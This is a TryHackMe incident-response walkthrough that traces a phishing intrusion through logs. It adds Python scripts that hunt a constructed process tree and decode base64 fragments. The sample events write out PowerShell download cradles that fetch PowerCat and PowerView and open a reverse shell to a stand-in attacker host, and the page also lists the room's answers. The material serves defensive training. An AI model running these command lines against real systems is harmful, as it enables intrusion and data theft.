Trnty

Summary

This page is a step-by-step walkthrough of the "Hunt Me I: Payment Collectors" challenge on TryHackMe. It traces the investigation of a breach in which a Finance Director was phished, and the chain of malicious activity that followed on the victim's workstation.

Abstract

The "Hunt Me I: Payment Collectors" walkthrough on TryHackMe takes the reader through the forensic analysis of an intrusion, answer by answer. It begins with the ZIP attachment, Invoice_AT_2023-227.zip, that an employee named Michael downloaded. Extracting it produced a shortcut file, Payment_Invoice.pdf.lnk.lnk, which when opened spawned powershell.exe. That PowerShell process downloaded the PowerCat script from https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1 and used it to open a reverse shell to the attacker on port 19282. Post-exploitation activity included running systeminfo.exe for host enumeration, downloading powerview.ps1 to enumerate the domain, and mapping a file share named SSF-FinancialRecords. The attacker copied the share's contents to a local directory, including ClientPortfolioSummary.xlsx, packaged them into an archive named exfilt8me.zip, and exfiltrated it to the attacker's server, haz4rdw4re.io, using the technique catalogued by MITRE ATT&CK as T1048 (Exfiltration Over Alternative Protocol). The walkthrough concludes with a final task: reconstructing one more exfiltrated file by joining two base64 fragments recovered from the logs and decoding them to obtain the flag.

Opinions

  • The walkthrough is structured to provide clear, actionable steps for incident response and forensic analysis, suggesting a methodical approach to cybersecurity education.
  • The use of real-world tools like PowerCat and PowerView indicates a focus on practical, hands-on learning experiences.
  • The inclusion of MITRE ATT&CK framework references (e.g., T1048) shows alignment with the industry-standard taxonomy for describing adversary techniques.
  • The challenge seems designed to enhance the participant's skills in log analysis, attack-chain reconstruction, and understanding of attacker methodologies.
  • The presence of a final task involving the reconstruction of an exfiltrated file suggests an emphasis on the importance of attention to detail and the use of tools like CyberChef in the incident response process.

TryHackMe | Hunt Me I: Payment Collectors Walkthrough

A Finance Director was recently phished. Can you hunt the logs and determine what damage was done?

Link: https://tryhackme.com/room/paymentcollectors

What was the name of the ZIP attachment that Michael downloaded?

Invoice_AT_2023-227.zip

What was the contained file that Michael extracted from the attachment?

Payment_Invoice.pdf.lnk.lnk

What was the name of the command-line process that spawned from the extracted file attachment?

powershell.exe

What URL did the attacker use to download a tool to establish a reverse shell connection?

https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1

What port did the workstation connect to the attacker on?

19282

What was the first native Windows binary the attacker ran for system enumeration after obtaining remote access?

systeminfo.exe

What is the URL of the script that the attacker downloads to enumerate the domain?

https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1

What was the name of the file share that the attacker mapped to Michael’s workstation?

SSF-FinancialRecords

What directory did the attacker copy the contents of the file share to?

C:\Users\michael.ascot\downloads\exfiltration

What was the name of the Excel file the attacker extracted from the file share?

ClientPortfolioSummary.xlsx

What was the name of the archive file that the attacker created to prepare for exfiltration?

exfilt8me.zip

What is the MITRE ID of the technique that the attacker used to exfiltrate the data?

T1048

What was the domain of the attacker’s server that retrieved the exfiltrated data?

haz4rdw4re.io
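The answers above are what a hunt over process-creation telemetry yields once the LNK-spawned PowerShell is found and its process tree is followed. The script below is an added example written for this page, not the room's queries or any code from the walkthrough author. It runs that hunt over a handful of constructed events: the field names, PIDs, timestamps, the hosts "fileserver" and "attacker.invalid" and the exact command lines are assumptions made here; only the file names, URLs, port, share and paths are taken from the answers above. The seed it looks for is explorer.exe spawning powershell.exe with a download cradle, which is how opening a malicious .lnk shows up in process logs, since the .lnk name itself is not part of a process-creation record.

```python
import re
from collections import defaultdict

# Constructed process-creation events, not the room's real telemetry. The field
# names, PIDs, timestamps, the hosts "fileserver" and "attacker.invalid" and the
# exact command lines are assumptions made for this example; only the file
# names, URLs, port, share and paths come from the walkthrough's answers.
EVENTS = [
    {"ts": 1, "pid": 4100, "ppid": 1200, "image": "explorer.exe",
     "cmdline": "explorer.exe"},
    # Opening the .lnk appears as explorer.exe spawning powershell.exe with the
    # shortcut's target as its command line; the .lnk name itself is not logged.
    {"ts": 2, "pid": 4312, "ppid": 4100, "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('https://raw.githubusercontent.com/besimorhino/"
                "powercat/master/powercat.ps1'); powercat -c attacker.invalid "
                "-p 19282 -e powershell\""},
    {"ts": 3, "pid": 4400, "ppid": 4312, "image": "systeminfo.exe",
     "cmdline": "systeminfo.exe"},
    {"ts": 4, "pid": 4450, "ppid": 4312, "image": "powershell.exe",
     "cmdline": "powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString("
                "'https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/"
                "master/PowerView/powerview.ps1')\""},
    {"ts": 5, "pid": 4500, "ppid": 4312, "image": "net.exe",
     "cmdline": "net use Z: \\\\fileserver\\SSF-FinancialRecords"},
    {"ts": 6, "pid": 4550, "ppid": 4312, "image": "powershell.exe",
     "cmdline": "powershell.exe -c \"Copy-Item Z:\\* "
                "C:\\Users\\michael.ascot\\downloads\\exfiltration -Recurse; "
                "Compress-Archive -Path C:\\Users\\michael.ascot\\downloads\\exfiltration "
                "-DestinationPath C:\\Users\\michael.ascot\\downloads\\exfilt8me.zip\""},
    # An unrelated explorer.exe child: it must not be attributed to the attacker.
    {"ts": 7, "pid": 4600, "ppid": 4100, "image": "notepad.exe",
     "cmdline": "notepad.exe"},
]

URL_RE = re.compile(r"https?://[^\s'\")]+")
PORT_RE = re.compile(r"\bpowercat\b.*?\s-p\s+(\d+)")          # powercat -c host -p PORT
SHARE_RE = re.compile(r"\bnet\s+use\s+\S+\s+\\\\[^\\\s]+\\(\S+)", re.I)
COPY_RE = re.compile(r"\bCopy-Item\s+\S+\s+(\S+)", re.I)       # source, then destination
ZIP_RE = re.compile(r"-DestinationPath\s+([^\s\"]+)", re.I)


def hunt(events):
    """Find the .lnk-spawned PowerShell, walk its process tree in time order and
    pull the indicators the room asks for out of the command lines."""
    by_pid = {e["pid"]: e for e in events}
    kids = defaultdict(list)
    for e in events:
        kids[e["ppid"]].append(e)

    seed = next((e for e in events
                 if e["image"].lower() == "powershell.exe"
                 and by_pid.get(e["ppid"], {}).get("image", "").lower() == "explorer.exe"
                 and "downloadstring" in e["cmdline"].lower()), None)
    if seed is None:
        return None

    # Everything the seed spawned, directly or indirectly, sorted by time so
    # "first binary after access" is meaningful.
    chain, stack = [], [seed]
    while stack:
        cur = stack.pop()
        chain.append(cur)
        stack.extend(kids.get(cur["pid"], []))
    chain.sort(key=lambda e: e["ts"])
    cmds = [e["cmdline"] for e in chain]

    def first(rx):
        for c in cmds:
            m = rx.search(c)
            if m:
                return m.group(1)
        return None

    native = [e["image"] for e in chain[1:] if e["image"].lower() != "powershell.exe"]
    port = first(PORT_RE)
    archive = first(ZIP_RE)
    return {
        "spawned_process": seed["image"],
        "download_urls": [u for c in cmds for u in URL_RE.findall(c)],
        "reverse_shell_port": int(port) if port else None,
        "first_native_enum_binary": native[0] if native else None,
        "mapped_share": first(SHARE_RE),
        "copy_destination": first(COPY_RE),
        "archive": archive.rsplit("\\", 1)[-1] if archive else None,
    }


if __name__ == "__main__":
    for key, value in hunt(EVENTS).items():
        print(f"{key}: {value}")
```

Anchoring on the process tree rather than on string matches alone is what keeps the unrelated notepad.exe out of the result; on real telemetry the same idea is applied with the parent-process fields of whichever log source is in use.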

The attacker exfiltrated an additional file from the victim’s workstation. What is the flag you receive after reconstructing the file?

Find the two halves of the base64 string in the two log entries, join them in the right order, and decode the result in CyberChef (From Base64) to recover the file and the flag.
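One way to do that step outside CyberChef, as an added example that is not part of the original walkthrough: the script below pulls the two fragments out of constructed script-block log lines, orders them by timestamp and decodes the joined string. The timestamps, host name, variable names and the base64 content (which decodes to a placeholder, not the room's flag) are all invented for the example. The point it makes that the page does not is that the fragments must be joined before decoding, because the attacker's split need not fall on a 4-character base64 boundary, and that log order is not necessarily fragment order.

```python
import base64
import re

# Constructed log lines, not the room's real events: timestamps, host name,
# variable names and the base64 content (a placeholder, not the room's flag)
# are invented for this example. EventID 4104 is PowerShell script-block
# logging; the second fragment is logged out of order here on purpose.
LOG_LINES = [
    '2023-01-01T00:00:09Z host=WKSTN01 EventID=4104 ScriptBlockText="$b = \'4YW1wbGV9\'"',
    '2023-01-01T00:00:02Z host=WKSTN01 EventID=4688 CommandLine="whoami.exe"',
    '2023-01-01T00:00:04Z host=WKSTN01 EventID=4104 ScriptBlockText="$a = \'VEhNe2V\'"',
]

# Matches one fragment assignment; the key=value layout is this example's
# assumption about the log format, not a real product's schema.
FRAG_RE = re.compile(
    r"^(?P<ts>\S+) .*ScriptBlockText=\"\$\w+ = '(?P<b64>[A-Za-z0-9+/=]+)'\"")


def extract_fragments(lines):
    """Return the base64 fragments in timestamp order (ISO-8601 sorts lexically)."""
    found = []
    for line in lines:
        m = FRAG_RE.match(line)
        if m:
            found.append((m.group("ts"), m.group("b64")))
    return [b64 for _, b64 in sorted(found)]


def decode_joined(fragments):
    """Join first, then decode: a fragment on its own is not a valid unit when
    the split does not land on a 4-character boundary."""
    joined = "".join(fragments)
    joined += "=" * (-len(joined) % 4)   # restore any padding stripped from the tail
    return base64.b64decode(joined, validate=True)


def reconstruct(lines):
    return decode_joined(extract_fragments(lines))


if __name__ == "__main__":
    print(reconstruct(LOG_LINES).decode())   # THM{example}
```

With validate=True a stray non-alphabet character (a quote or a trailing bracket captured by an over-greedy regex) raises instead of being silently dropped, which is the failure to watch for when the fragments are copied out of a log by hand.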

That’s it! See you in the next Room :)

Tryhackme
Investigation
Incident Response
Cybersecurity
Finance